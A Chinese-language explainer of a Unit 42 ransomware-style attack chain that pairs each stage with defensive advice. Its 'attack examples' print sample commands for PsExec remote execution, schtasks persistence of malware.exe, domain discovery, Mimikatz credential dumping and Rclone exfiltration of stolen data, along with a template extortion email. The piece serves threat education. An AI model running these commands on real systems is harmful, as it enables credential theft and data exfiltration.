
這張圖片來自 Palo Alto Networks 的 Unit 42 安全團隊的分析,是一個非常專業的攻擊鏈分析圖,展示了現代網絡攻擊的複雜性和系統性。攻擊者使用了多種工具和技術,從初始訪問到最終的數據竊取,每個步驟都經過精心策劃。
- 初始訪問 (Initial Access via Atera)
- Atera 是一個合法的 RMM(遠程監控和管理)工具,常被 IT 管理員用來遠程管理電腦。
- 攻擊者從黑市購買被盜的 Atera 授權或訪問權限來入侵受害者網絡。
- 利用合法工具進行非法訪問,這種手法稱為 “Living off the Land”。
- 防護建議:
- 嚴格控制 RMM 工具的使用權限。
- 監控異常的遠程連接。
- 實施多因素認證(MFA)。
- 橫向移動、持久性和命令控制 (Lateral Movement, Persistence and C2 Activity)
- 攻擊者部署了 PsExec(一個系統管理工具), PsExec 是微軟的系統管理工具,可以在遠程系統上執行程序。
- 在受害者網路中部署了 Cobalt Strike , 這是一套專業的滲透測試工具,常被攻擊者濫用。
- 通過計劃任務定期執行這些惡意程序。
- 攻擊示例:
- # 使用 PsExec 在遠程主機執行命令
psexec \\remote-pc -u admin -p password cmd.exe# 設置計劃任務保持持久性
schtasks /create /tn “SystemUpdate” /tr “malware.exe” /sc daily /st 12:00 - 防護建議:
- 限制橫向移動的能力(網絡分段)。
- 監控可疑的計劃任務。
- 實施最小權限原則。
- 內部探索、憑證獲取和防禦規避 (Internal Discovery, Credential Access and Defense Evasion)
- 在被入侵的域控制器上執行了一系列內部探索命令。
- 使用 Mimikatz (強大的密碼提取工具) 和 LSASS dump 進程轉儲來獲取憑證(從 Windows 安全子系統提取憑證)。
- 執行了一個名為 disabler.exe 的工具來禁用防毒/EDR 軟件。
- 攻擊示例:
- # 內部探索命令
net group “Domain Admins” /domain
nltest /dclist:domain# Mimikatz 命令
privilege::debug
sekurlsa::logonpasswords - 防護建議:
- 實施 Credential Guard。
- 監控 LSASS 進程訪問。
- 使用 PAM(特權訪問管理)。
- 惡意機器連接 (Rogue Machines)
- 攻擊者控制的惡意虛擬機連接到受害者的網路。
- 繞過安全控制,從這些惡意機器上發現了多個惡意工具包。
- 防護建議:
- 實施強制的設備註冊。
- 使用 NAC(網絡訪問控制)。
- 監控異常設備行為。
- 勒索郵件 (Threat Actor Extortion Email)
- 受害者收到來自攻擊者的勒索郵件。
- 攻擊者聲稱已經獲取了網絡訪問權限並竊取了大量文件。
- 典型勒索郵件格式:
- 主題:緊急 – 您的網絡已被入侵
內容:
我們已經獲取了您網絡的完整訪問權限,並下載了以下敏感數據:
– 財務文件
– 客戶數據
– 內部文檔 如果想要恢復數據,請支付 XX 比特幣到以下地址…
- 防護建議:
- 定期備份關鍵數據。
- 制定事件響應計劃。
- 進行社工防範培訓。
- 數據竊取 (Exfiltration)
- 使用 Rclone 開源的雲存儲管理工具,從受害者網絡中竊取數據
- 攻擊示例:
- # 使用 Rclone 竊取數據
rclone copy /sensitive-data remote:backup# 常見的數據壓縮和加密
7z a -p password stolen-data.7z /sensitive-data/* - 防護建議:
- 實施 DLP(數據洩露防護)
- 監控異常的數據傳輸
- 加密敏感數據
整體防護建議:
- 預防措施:
- 實施零信任架構
- 定期進行安全評估
- 保持系統和軟件更新
- 檢測措施:
- 部署 EDR/XDR 解決方案
- 實施 SIEM 系統
- 進行持續的安全監控
- 響應措施:
- 制定詳細的事件響應計劃
- 定期進行應急演練
- 建立安全事件響應團隊
- 恢復措施:
- 維護離線備份
- 制定業務連續性計劃
- 定期測試恢復程序
這種攻擊鏈分析對於理解現代網絡威脅非常重要,它幫助組織:
- 理解攻擊者的戰術和技術
- 識別防禦中的薄弱環節
- 優化安全控制措施
- 提高整體安全態勢



零信任架構建置已成為基本資安要務